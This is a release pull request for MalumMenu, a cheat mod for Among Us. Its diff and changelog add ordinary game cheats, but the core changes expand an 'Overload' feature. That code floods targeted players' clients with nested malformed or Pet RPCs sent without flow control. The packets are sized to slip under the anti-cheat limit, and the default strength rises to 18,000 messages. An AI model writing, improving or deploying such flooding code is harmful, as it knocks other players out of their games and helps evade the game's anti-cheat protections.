### PR TITLE
v3.1.1 Release

### DIFF
--- a/README.md
+++ b/README.md
@@ -39,6 +39,7 @@
 
 | Mod Version| Among Us - Version | Link |
 |----------|-------------|-----------------|
+| v3.1.1 | 17.3 ( 2026.3.31 ) | [Download](https://github.com/scp222thj/MalumMenu/releases/tag/v3.1.1) |
 | v3.1.0 | 17.3 ( 2026.3.31 ) | [Download](https://github.com/scp222thj/MalumMenu/releases/tag/v3.1.0) |
 | v3.0.2 | 17.2.2 ( 2026.3.17 )<br>17.2.1 ( 2026.2.24 ) | [Download](https://github.com/scp222thj/MalumMenu/releases/tag/v3.0.2) |
 | v3.0.1 | 17.2.2 ( 2026.3.17 )<br>17.2.1 ( 2026.2.24 ) | [Download](https://github.com/scp222thj/MalumMenu/releases/tag/v3.0.1) |
@@ -135,7 +136,7 @@ Click to expand each topic
 
 <summary><h2>❗ I'm having issues installing MalumMenu</h2></summary>
 
-First of all, make sure you are running the most recent version of Among Us (`17.3` / `2026.3.31`) with the most recent version of MalumMenu (`v3.1.0`).
+First of all, make sure you are running the most recent version of Among Us (`17.3` / `2026.3.31`) with the most recent version of MalumMenu (`v3.1.1`).
 
 Also, check if your platform is officially supported:
 

--- a/src/Cheats/MalumCheats.cs
+++ b/src/Cheats/MalumCheats.cs
@@ -83,14 +83,6 @@ public static class MalumCheats
         CheatToggles.forceStartGame = false;
     }
 
-    public static void NoKillCdCheat(PlayerControl playerControl)
-    {
-        if (CheatToggles.noKillCd && playerControl.killTimer > 0f)
-        {
-            playerControl.SetKillTimer(0f);
-        }
-    }
-
     public static void CompleteMyTasksCheat()
     {
         if (CheatToggles.completeMyTasks)

--- a/src/MalumMenu.cs
+++ b/src/MalumMenu.cs
@@ -122,10 +122,10 @@ public partial class MalumMenu : BasePlugin
 
         adaptMaxStrength = Config.Bind("MalumMenu.Overload",
                                 "AdaptMaxStrength",
-                                500,
+                                5000,
                                 new ConfigDescription(
                                     "Maximum total number of RPCs sent during one overload cycle in AutoAdapt mode. Automatically divided between targets and reduced based on ping. IMPORTANT: Only goes from 1 to 1000 RPCs",
-                                    new AcceptableValueRange<int>(1, 1000)
+                                    new AcceptableValueRange<int>(1, 10000)
                                 ));
 
         adaptMaxCooldown = Config.Bind("MalumMenu.Overload",
@@ -143,10 +143,10 @@ public partial class MalumMenu : BasePlugin
 
         defaultStrength = Config.Bind("MalumMenu.Overload",
                                 "DefaultStrength",
-                                500,
+                                5000,
                                 new ConfigDescription(
                                     "Default number of malformed RPCs sent to each target during an overload cycle. Overridden if AutoAdapt mode is enabled. IMPORTANT: Only goes from 1 to 1000 RPCs",
-                                    new AcceptableValueRange<int>(1, 1000)
+                                    new AcceptableValueRange<int>(1, 10000)
                                 ));
 
         defaultCooldown = Config.Bind("MalumMenu.Overload",

--- a/src/MalumMenu.cs
+++ b/src/MalumMenu.cs
@@ -124,10 +124,10 @@ public partial class MalumMenu : BasePlugin
 
         adaptMaxStrength = Config.Bind("MalumMenu.Overload",
                                 "AdaptMaxStrength",
-                                5000,
+                                18000,
                                 new ConfigDescription(
-                                    "Maximum total number of RPCs sent during one overload cycle in AutoAdapt mode. Automatically divided between targets and reduced based on ping. IMPORTANT: Only goes from 1 to 1000 RPCs",
-                                    new AcceptableValueRange<int>(1, 10000)
+                                    "Maximum total number of RPCs sent during one overload cycle in AutoAdapt mode. Automatically divided between targets and reduced based on ping. IMPORTANT: Only goes from 1 to 100K RPCs",
+                                    new AcceptableValueRange<int>(1, 100000)
                                 ));
 
         adaptMaxCooldown = Config.Bind("MalumMenu.Overload",
@@ -145,10 +145,10 @@ public partial class MalumMenu : BasePlugin
 
         defaultStrength = Config.Bind("MalumMenu.Overload",
                                 "DefaultStrength",
-                                5000,
+                                18000,
                                 new ConfigDescription(
-                                    "Default number of malformed RPCs sent to each target during an overload cycle. Overridden if AutoAdapt mode is enabled. IMPORTANT: Only goes from 1 to 1000 RPCs",
-                                    new AcceptableValueRange<int>(1, 10000)
+                                    "Default number of malformed RPCs sent to each target during an overload cycle. Overridden if AutoAdapt mode is enabled. IMPORTANT: Only goes from 1 to 100K RPCs",
+                                    new AcceptableValueRange<int>(1, 100000)
                                 ));
 
         defaultCooldown = Config.Bind("MalumMenu.Overload",

--- a/src/MalumMenu.cs
+++ b/src/MalumMenu.cs
@@ -1,4 +1,5 @@
-﻿using BepInEx;
+﻿using System.IO;
+using BepInEx;
 using BepInEx.Unity.IL2CPP;
 using UnityEngine.SceneManagement;
 using System;
@@ -18,6 +19,7 @@ public partial class MalumMenu : BasePlugin
     public Harmony Harmony { get; } = new(Id);
     public static MalumMenu Plugin;
     public new static ManualLogSource Log;
+    public static readonly string ProfilePath = Path.Combine(Paths.ConfigPath, "MalumProfile.txt");
 
     public static MenuUI menuUI;
     public static ConsoleUI consoleUI;
@@ -202,7 +204,13 @@ public partial class MalumMenu : BasePlugin
             PerformanceReporting.enabled = false;
         }
 
-        // Load profile on start
+        // Create profile file if it is missing
+        if (!File.Exists(ProfilePath))
+        {
+            CheatToggles.SaveTogglesToProfile();
+        }
+
+        // Auto load profile on start if needed
         if (autoLoadProfile.Value)
         {
             CheatToggles.LoadTogglesFromProfile();

--- a/src/MalumMenu.cs
+++ b/src/MalumMenu.cs
@@ -30,7 +30,7 @@ public partial class MalumMenu : BasePlugin
     public static ProtectUI protectUI;
     public static KeybindListener keybindListener;
 
-    public static string malumVersion = "3.1.0";
+    public static string malumVersion = "3.1.1";
     public static List<string> supportedAU = new List<string> { "2026.3.31" };
     public static bool isPanicked = false;
     public static bool inStealthMode = false;

--- a/src/MalumMenu.csproj
+++ b/src/MalumMenu.csproj
@@ -4,7 +4,7 @@
         <LangVersion>latest</LangVersion>
         <DebugType>embedded</DebugType>
 
-        <VersionPrefix>3.0.2</VersionPrefix>
+        <VersionPrefix>3.1.1</VersionPrefix>
         <Description>all play and no cheats makes among us a dull game</Description>
         <Authors>scp222thj, astra1dev</Authors>
     </PropertyGroup>

--- a/src/Patches/PlayerControlPatches.cs
+++ b/src/Patches/PlayerControlPatches.cs
@@ -137,17 +137,20 @@ public static class PlayerControl_Shapeshift
 
         var targetPlayerInfo = targetPlayer.Data;
 
+        var room = Utils.GetRoomFromPosition(__instance.GetTruePosition());
+        var roomName = room != null ? room.RoomId.ToString() : "an unknown location";
+
         if (targetPlayerInfo.PlayerId == __instance.Data.PlayerId)
         {
             ConsoleUI.Log($"<color=#{ColorUtility.ToHtmlStringRGB(GameData.Instance.GetPlayerById(__instance.PlayerId).Color)}>" +
-                          $"{GameData.Instance.GetPlayerById(__instance.PlayerId)._object.Data.PlayerName}</color> undid their shapeshift");
+                          $"{GameData.Instance.GetPlayerById(__instance.PlayerId)._object.Data.PlayerName}</color> undid their shapeshift in {roomName}");
         }
         else
         {
             ConsoleUI.Log($"<color=#{ColorUtility.ToHtmlStringRGB(GameData.Instance.GetPlayerById(__instance.PlayerId).Color)}>" +
                           $"{GameData.Instance.GetPlayerById(__instance.PlayerId)._object.Data.PlayerName}</color> shapeshifted into " +
                           $"<color=#{ColorUtility.ToHtmlStringRGB(GameData.Instance.GetPlayerById(targetPlayerInfo.PlayerId).Color)}>" +
-                          $"{GameData.Instance.GetPlayerById(targetPlayerInfo.PlayerId)._object.Data.PlayerName}</color>");
+                          $"{GameData.Instance.GetPlayerById(targetPlayerInfo.PlayerId)._object.Data.PlayerName}</color> in {roomName}");
         }
     }
 }

--- a/src/Patches/PlayerControlPatches.cs
+++ b/src/Patches/PlayerControlPatches.cs
@@ -3,17 +3,15 @@ using UnityEngine;
 
 namespace MalumMenu;
 
-[HarmonyPatch(typeof(PlayerControl), nameof(PlayerControl.FixedUpdate))]
-public static class PlayerControl_FixedUpdate
+[HarmonyPatch(typeof(PlayerControl), nameof(PlayerControl.SetKillTimer))]
+public static class PlayerControl_SetKillTimer
 {
-    public static void Postfix(PlayerControl __instance)
+    // Prefix patch of PlayerControl.SetKillTimer to remove kill cooldown
+    public static void Prefix(PlayerControl __instance, ref float time)
     {
+        if (!__instance.AmOwner || !Utils.isHost || !CheatToggles.noKillCd) return;
 
-        if (__instance.AmOwner)
-        {
-            MalumCheats.NoKillCdCheat(__instance);
-        }
-
+        time = 0f;
     }
 }
 

--- a/src/UI/Elements/CheatToggles.cs
+++ b/src/UI/Elements/CheatToggles.cs
@@ -180,8 +180,6 @@ public struct CheatToggles
     // Map for Reflection Access: Toggle Name -> FieldInfo
     public static readonly Dictionary<string, FieldInfo> ToggleFields = new();
 
-    public static readonly string ProfilePath = Path.Combine(BepInEx.Paths.ConfigPath, "MalumProfile.txt");
-
     // Populate reflection map once at startup and initialize Keybinds with KeyCode.None
     static CheatToggles()
     {
@@ -227,7 +225,7 @@ public struct CheatToggles
     // Format per line: ToggleName = True/False = KeyCode.KEY
     public static void SaveTogglesToProfile()
     {
-        using var writer = new StreamWriter(ProfilePath);
+        using var writer = new StreamWriter(MalumMenu.ProfilePath);
 
         writer.WriteLine("# MalumProfile");
         writer.WriteLine("# Format: ToggleName = True/False = KeyCode.KEY");
@@ -248,9 +246,9 @@ public struct CheatToggles
     // Format per line: ToggleName = True/False = KeyCode.KEY
     public static void LoadTogglesFromProfile()
     {
-        if (!File.Exists(ProfilePath)) return;
+        if (!File.Exists(MalumMenu.ProfilePath)) return;
 
-        using var reader = new StreamReader(ProfilePath);
+        using var reader = new StreamReader(MalumMenu.ProfilePath);
 
         while (reader.ReadLine() is { } line)
         {

--- a/src/UI/Windows/MenuUI.cs
+++ b/src/UI/Windows/MenuUI.cs
@@ -126,7 +126,6 @@ public class MenuUI : MonoBehaviour
             if (CheatToggles.runOverload)
             {
                 OverloadUI.StopOverload();
-                OverloadHandler.ClearCustomTargets();
             }
         }
 

--- a/src/UI/Windows/OverloadUI.cs
+++ b/src/UI/Windows/OverloadUI.cs
@@ -80,11 +80,11 @@ public class OverloadUI : MonoBehaviour
             }
         }
 
-        // The HashSet swap (currentTargets <-> _tmpTargets) can only be done if AmClient
-        // Otherwise currentTargets gets cleared too early during disconnect with overload on,
+        // The HashSet swap (currentTargets <-> _tmpTargets) can only be done if isPlayer
+        // Otherwise currentTargets gets cleared too early in endgame / disconnect with overload on,
         // causing the STOP message to log the wrong total count
 
-        if (Utils.isClient && AmongUsClient.Instance.AmClient)
+        if (Utils.isPlayer)
         {
             var old = currentTargets;
             currentTargets = _tmpTargets;
@@ -92,9 +92,13 @@ public class OverloadUI : MonoBehaviour
         }
         else
         {
-            // currentTargets is cleared here if STOP log is done / unneeded (overload off)
+            // Targets are cleared here if STOP log is done / unneeded (overload off)
 
-            if (!CheatToggles.runOverload) currentTargets.Clear();
+            if (!CheatToggles.runOverload)
+            {
+                currentTargets.Clear();
+                OverloadHandler.ClearCustomTargets();
+            }
 
             _hasAutoStarted = false;
         }

--- a/src/UI/Windows/Tabs/OverloadTab.cs
+++ b/src/UI/Windows/Tabs/OverloadTab.cs
@@ -204,7 +204,7 @@ public class OverloadTab : ITab
         }
 
         GUILayout.Space(5);
-        bool isPressedMaxStrength = GUILayout.Button($"{_maxStrength}", GUILayout.Width(50f));
+        bool isPressedMaxStrength = GUILayout.Button($"{_maxStrength}", GUILayout.Width(51f));
 
         GUILayout.EndHorizontal();
 
@@ -224,7 +224,7 @@ public class OverloadTab : ITab
         }
 
         GUILayout.Space(5);
-        bool isPressedMaxCooldown = GUILayout.Button($"{_maxCooldown:F0}", GUILayout.Width(50f));
+        bool isPressedMaxCooldown = GUILayout.Button($"{_maxCooldown:F0}", GUILayout.Width(51f));
 
         GUILayout.EndHorizontal();
 

--- a/src/UI/Windows/Tabs/OverloadTab.cs
+++ b/src/UI/Windows/Tabs/OverloadTab.cs
@@ -8,7 +8,7 @@ public class OverloadTab : ITab
     public string name => "Overload";
 
     private GUIStyle _sliderSubtitle;
-    private int _maxStrength = 1000;
+    private int _maxStrength = 10000;
     private float _maxCooldown = 1f;
     private float _fpsEstimate = 0f;
     private float _rawCooldown;
@@ -253,11 +253,11 @@ public class OverloadTab : ITab
 
         if (isPressedMaxStrength)
         {
-            if (_maxStrength >= 1000) // Max _maxStrength = 1000 RPCs
+            if (_maxStrength >= 10000) // Max _maxStrength = 10000 RPCs
             {
                 CheatToggles.olAutoAdapt = false; // Disable AutoAdapt if user does manual input
 
-                OverloadHandler.strength = Mathf.RoundToInt(OverloadHandler.strength/10f); // Adjust value to account for max change (÷10)
+                OverloadHandler.strength = Mathf.RoundToInt(OverloadHandler.strength/100f); // Adjust value to account for max change (÷10)
 
                 _maxStrength = 100; // Min _maxStrength = 100 RPCs
             }

--- a/src/UI/Windows/Tabs/OverloadTab.cs
+++ b/src/UI/Windows/Tabs/OverloadTab.cs
@@ -8,7 +8,7 @@ public class OverloadTab : ITab
     public string name => "Overload";
 
     private GUIStyle _sliderSubtitle;
-    private int _maxStrength = 10000;
+    private int _maxStrength = 100000;
     private float _maxCooldown = 1f;
     private float _fpsEstimate = 0f;
     private float _rawCooldown;
@@ -253,11 +253,11 @@ public class OverloadTab : ITab
 
         if (isPressedMaxStrength)
         {
-            if (_maxStrength >= 10000) // Max _maxStrength = 10000 RPCs
+            if (_maxStrength >= 100000) // Max _maxStrength = 100K RPCs
             {
                 CheatToggles.olAutoAdapt = false; // Disable AutoAdapt if user does manual input
 
-                OverloadHandler.strength = Mathf.RoundToInt(OverloadHandler.strength/100f); // Adjust value to account for max change (÷10)
+                OverloadHandler.strength = Mathf.RoundToInt(OverloadHandler.strength/1000f); // Adjust value to account for max change (÷1000)
 
                 _maxStrength = 100; // Min _maxStrength = 100 RPCs
             }

--- a/src/UI/Windows/Tabs/OverloadTab.cs
+++ b/src/UI/Windows/Tabs/OverloadTab.cs
@@ -191,6 +191,7 @@ public class OverloadTab : ITab
     private void DrawSettingsSliders()
     {
         GUILayout.Label($"Strength : {_rawStrength}", _sliderSubtitle);
+
         GUILayout.Space(1);
 
         GUILayout.BeginHorizontal();
@@ -204,13 +205,16 @@ public class OverloadTab : ITab
         }
 
         GUILayout.Space(5);
-        bool isPressedMaxStrength = GUILayout.Button($"{_maxStrength}", GUILayout.Width(51f));
+
+        string maxStrengthStr = _maxStrength % 1000 == 0 ? $"{_maxStrength / 1000}K" : $"{_maxStrength}";
+        bool isPressedMaxStrength = GUILayout.Button(maxStrengthStr, GUILayout.Width(51f));
 
         GUILayout.EndHorizontal();
 
         GUILayout.Space(10);
 
         GUILayout.Label($"Cooldown : {_rawCooldown:F2}", _sliderSubtitle);
+
         GUILayout.Space(1);
 
         GUILayout.BeginHorizontal();
@@ -224,6 +228,7 @@ public class OverloadTab : ITab
         }
 
         GUILayout.Space(5);
+
         bool isPressedMaxCooldown = GUILayout.Button($"{_maxCooldown:F0}", GUILayout.Width(51f));
 
         GUILayout.EndHorizontal();

--- a/src/Utilities/Utils.cs
+++ b/src/Utilities/Utils.cs
@@ -261,6 +261,8 @@ public static class Utils
         }
     }
 
+    // Returns the max number of nested RPCs that can be in a GameData message
+    // without getting kicked by AC
     public static int GetMaxRpcPackingLimit()
     {
         int num = 0;

--- a/src/Utilities/Utils.cs
+++ b/src/Utilities/Utils.cs
@@ -264,6 +264,12 @@ public static class Utils
     // Overloads target with set strength using malformed RPCs
     public static void Overload(int targetId, int strength)
     {
+        if (strength < 1) return;
+
+        // Host = max 40 / Client = max 10 nested RPCs in a single GameData msg (allowed by AC)
+
+        int maxRpc = AmongUsClient.Instance.AmHost ? 40 : 10;
+
         // ClimbLadder RPC is only effective in maps with no ladders or in lobby
         // SetStartCounter RPC is only effective when NOT in lobby
 
@@ -272,10 +278,49 @@ public static class Utils
         uint netId = hasLadders ? PlayerControl.LocalPlayer.NetId : PlayerControl.LocalPlayer.MyPhysics.NetId;
         byte rpcCall = hasLadders ? (byte)RpcCalls.SetStartCounter : (byte)RpcCalls.ClimbLadder;
 
-        for (int i = 0; i < strength; i++) // Strength = Num of malformed RPCs sent
+        if (strength <= maxRpc)
         {
-            MessageWriter overloadMsg = AmongUsClient.Instance.StartRpcImmediately(netId, rpcCall, SendOption.None, targetId);
-            AmongUsClient.Instance.FinishRpcImmediately(overloadMsg);
+            // SendOption.None has no flow control, allowing for flooding without limits
+
+            var messageWriter = MessageWriter.Get(SendOption.None);
+
+            if (targetId < 0) // -1 = Broadcast
+            {
+                messageWriter.StartMessage(Tags.GameData);
+                messageWriter.Write(AmongUsClient.Instance.GameId);
+            }
+            else
+            {
+                messageWriter.StartMessage(Tags.GameDataTo);
+                messageWriter.Write(AmongUsClient.Instance.GameId);
+                messageWriter.WritePacked(targetId);
+            }
+
+            for (var msg = 0; msg < strength; msg++)
+            {
+                messageWriter.StartMessage((byte)GameDataTypes.RpcFlag);
+                messageWriter.WritePacked(netId);
+                messageWriter.Write(rpcCall);
+                messageWriter.EndMessage();
+            }
+
+            messageWriter.EndMessage();
+
+            AmongUsClient.Instance.connection.Send(messageWriter);
+
+            messageWriter.Recycle();
+        }
+        else
+        {
+            int strengthGroups = strength / maxRpc;
+            int remainder = strength % maxRpc;
+
+            for (int group = 0; group < strengthGroups; group++)
+            {
+                Overload(targetId, maxRpc);
+            }
+
+            Overload(targetId, remainder);
         }
     }
 

--- a/src/Utilities/Utils.cs
+++ b/src/Utilities/Utils.cs
@@ -261,12 +261,24 @@ public static class Utils
         }
     }
 
+    public static int GetMaxRpcPackingLimit()
+    {
+        int num = 0;
+
+        if (isClient && AmongUsClient.Instance.AmHost)
+        {
+            num = GameManager.Instance.LogicOptions.MaxPlayers * 2;
+        }
+
+        return 10 + num;
+    }
+
     // Overloads target with set strength using malformed RPCs
     public static void Overload(int targetId, int strength)
     {
         if (strength < 1) return;
 
-        int maxRpc = AmongUsClient.Instance.GetMaxMessagePackingLimit();
+        int maxRpc = GetMaxRpcPackingLimit();
 
         // ClimbLadder RPC is only effective in maps with no ladders or in lobby
         // SetStartCounter RPC is only effective when NOT in lobby

--- a/src/Utilities/Utils.cs
+++ b/src/Utilities/Utils.cs
@@ -266,9 +266,7 @@ public static class Utils
     {
         if (strength < 1) return;
 
-        // Host = max 40 / Client = max 10 nested RPCs in a single GameData msg (allowed by AC)
-
-        int maxRpc = AmongUsClient.Instance.AmHost ? 40 : 10;
+        int maxRpc = AmongUsClient.Instance.GetMaxMessagePackingLimit();
 
         // ClimbLadder RPC is only effective in maps with no ladders or in lobby
         // SetStartCounter RPC is only effective when NOT in lobby

--- a/src/Utilities/Utils.cs
+++ b/src/Utilities/Utils.cs
@@ -323,7 +323,7 @@ public static class Utils
 
                 messageWriter.Write((ushort)0);
 
-		        messageWriter.Write((ushort)0);
+                messageWriter.Write((ushort)0);
 
                 messageWriter.EndMessage();
             }

--- a/src/Utilities/Utils.cs
+++ b/src/Utilities/Utils.cs
@@ -275,20 +275,17 @@ public static class Utils
         return 10 + num;
     }
 
-    // Overloads target with set strength using malformed RPCs
+    // Overloads target with set strength using Pet RPCs that
+    // repeatedly restart the hand-petting animation, preventing old petting coroutines
+    // from resolving
     public static void Overload(int targetId, int strength)
     {
         if (strength < 1) return;
 
         int maxRpc = GetMaxRpcPackingLimit();
 
-        // ClimbLadder RPC is only effective in maps with no ladders or in lobby
-        // SetStartCounter RPC is only effective when NOT in lobby
-
-        bool hasLadders = isShip && (isFungleMap || isAirshipMap);
-
-        uint netId = hasLadders ? PlayerControl.LocalPlayer.NetId : PlayerControl.LocalPlayer.MyPhysics.NetId;
-        byte rpcCall = hasLadders ? (byte)RpcCalls.SetStartCounter : (byte)RpcCalls.ClimbLadder;
+        uint netId = PlayerControl.LocalPlayer.MyPhysics.NetId;
+        byte rpcCall = (byte)RpcCalls.Pet;
 
         if (strength <= maxRpc)
         {
@@ -311,8 +308,23 @@ public static class Utils
             for (var msg = 0; msg < strength; msg++)
             {
                 messageWriter.StartMessage((byte)GameDataTypes.RpcFlag);
+
                 messageWriter.WritePacked(netId);
+
                 messageWriter.Write(rpcCall);
+
+                // Use LocalPlayer.GetTruePosition() as the petting position
+                // to minimize WalkPlayerTo delay and start the hand-petting animation immediately
+
+                NetHelpers.WriteVector2(PlayerControl.LocalPlayer.GetTruePosition(), messageWriter);
+
+                // Pet position is decoded as (-50, -50) on target clients
+                // This keeps the hand-petting animation out of normal view
+
+                messageWriter.Write((ushort)0);
+
+		        messageWriter.Write((ushort)0);
+
                 messageWriter.EndMessage();
             }
 


### PR DESCRIPTION
## Changelog
- **Feat**: Include room names in shapeshift Console logs ([#562](https://github.com/scp222thj/MalumMenu/pull/562))
- **Feat**: Enlarge max buttons in Overload tab ([#581](https://github.com/scp222thj/MalumMenu/pull/581))
- **Feat**: Automatically create profile file if it is missing ([#615](https://github.com/scp222thj/MalumMenu/pull/615))
- **Feat**: Increase max strength cap for Overload from 1K to 100K ([#581](https://github.com/scp222thj/MalumMenu/pull/581)) ([#619](https://github.com/scp222thj/MalumMenu/pull/619))
- **Feat**: Increase all default strength values for Overload from 500 to 18K ([#581](https://github.com/scp222thj/MalumMenu/pull/581)) ([#619](https://github.com/scp222thj/MalumMenu/pull/619))
- **Feat**: Use compact numbers for maxStrength button label in Overload tab ([#619](https://github.com/scp222thj/MalumMenu/pull/619))

- **Fix**: Replace old Overload technique with a working new one ([#619](https://github.com/scp222thj/MalumMenu/pull/619))
- **Fix**: Fix an issue that caused custom targets in Overload UI to not clear properly on disconnect ([#619](https://github.com/scp222thj/MalumMenu/pull/619))

- **Perf**: Use nested RPCs for Overload util ([#581](https://github.com/scp222thj/MalumMenu/pull/581))

- **Refactor**: Ensure kill cooldown is never set above 0s when using noKillCd ([#579](https://github.com/scp222thj/MalumMenu/pull/579))

- **Docs**: Add v3.1.1 to README ([#620](https://github.com/scp222thj/MalumMenu/pull/620))

- **Chore**: Bump Malum version from v3.1.0 to v3.1.1 ([#620](https://github.com/scp222thj/MalumMenu/pull/620))